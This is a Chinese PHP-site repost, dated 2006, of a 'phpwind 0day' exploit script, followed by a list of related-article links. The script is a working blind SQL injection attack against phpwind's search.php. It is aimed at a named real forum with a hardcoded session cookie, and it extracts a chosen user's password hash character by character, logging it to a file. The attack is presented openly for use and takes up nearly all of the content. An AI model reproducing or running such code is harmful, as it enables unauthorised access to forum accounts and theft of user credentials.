从网上搜到的phpwind 0day的代码


Posted in PHP onDecember 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo "<br>Done!We Post $count times!<br>";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

PHP 相关文章推荐
php allow_url_include的应用和解释
Apr 22 PHP
组合算法的PHP解答方法
Feb 04 PHP
php curl post 时出现的问题解决
Jan 30 PHP
使用pthreads实现真正的PHP多线程(需PHP5.3以上版本)
May 05 PHP
PHP随机数 C扩展随机数
May 04 PHP
CI框架集成Smarty的方法分析
May 17 PHP
PHP 输出缓冲控制(Output Control)详解
Aug 25 PHP
PHP将字符串首字母大小写转换的实例
Jan 21 PHP
PHP基于ORM方式操作MySQL数据库实例
Jun 21 PHP
深入理解PHP的远程多会话调试
Sep 21 PHP
PHP simplexml_load_string()函数实例讲解
Feb 03 PHP
PHP命名空间与自动加载机制的基础介绍
Aug 25 PHP
ajax缓存问题解决途径
Dec 06 #PHP
数字转英文
Dec 06 #PHP
?生?D片??C字串
Dec 06 #PHP
?算你??的 PHP 程式大小
Dec 06 #PHP
PHP中,文件上传
Dec 06 #PHP
eWebEditor v3.8 商业完整版 (PHP)
Dec 06 #PHP
实现 win2003 下 mysql 数据库每天自动备份
Dec 06 #PHP
You might like
Zerg基本策略
2020/03/14 星际争霸
用PHP写的MySQL数据库用户认证系统代码
2007/03/22 PHP
PHP线程的内存回收问题
2016/07/08 PHP
ThinkPHP的SAE开发相关注意事项详解
2016/10/09 PHP
My Desktop :) 桌面式代码
2008/12/29 Javascript
js字符串转换成xml对象并使用技巧解读
2013/04/18 Javascript
jQuery实现随意改变div任意属性的名称和值(部分原生js实现)
2013/05/28 Javascript
javascript格式化json显示实例分析
2015/04/21 Javascript
Jquery代码实现图片轮播效果(一)
2015/08/12 Javascript
分享JS代码实现鼠标放在输入框上输入框和图片同时更换样式
2016/09/01 Javascript
ES6新增的math,Number方法
2017/08/06 Javascript
深入理解React中何时使用箭头函数
2017/08/23 Javascript
vue 使用eventBus实现同级组件的通讯
2018/03/02 Javascript
浅谈vue.js导入css库(elementUi)的方法
2018/03/09 Javascript
jQuery实现简单复制json对象和json对象集合操作示例
2018/07/09 jQuery
Vue中使用vux配置代码详解
2018/09/16 Javascript
浅谈webpack性能榨汁机(打包速度优化)
2019/01/09 Javascript
详解如何理解vue的key属性
2019/04/14 Javascript
Python实现快速多线程ping的方法
2015/07/15 Python
Python+selenium 获取一组元素属性值的实例
2018/06/22 Python
Python + selenium + requests实现12306全自动抢票及验证码破解加自动点击功能
2018/11/23 Python
selenium python 实现基本自动化测试的示例代码
2019/02/25 Python
如何通过python画loss曲线的方法
2019/06/26 Python
python使用python-pptx删除ppt某页实例
2020/02/14 Python
python统计函数库scipy.stats的用法解析
2020/02/25 Python
各大浏览器 CSS3 和 HTML5 兼容速查表 图文
2010/04/01 HTML / CSS
美国修容界大佬创建的个人美妆品牌:Kevyn Aucoin Beauty
2018/12/12 全球购物
金融专业毕业生推荐信
2013/11/26 职场文书
毕业自我鉴定怎么写
2014/03/25 职场文书
教师先进工作者事迹材料
2014/05/01 职场文书
2014预防青少年违法犯罪工作总结
2014/12/10 职场文书
优秀毕业生主要事迹材料
2015/11/04 职场文书
《圆明园的毁灭》教学反思
2016/02/16 职场文书
如何理解PHP核心特性命名空间
2021/05/28 PHP
javascript的var与let,const之间的区别详解
2022/02/18 Javascript
MySQL创建管理KEY分区
2022/04/13 MySQL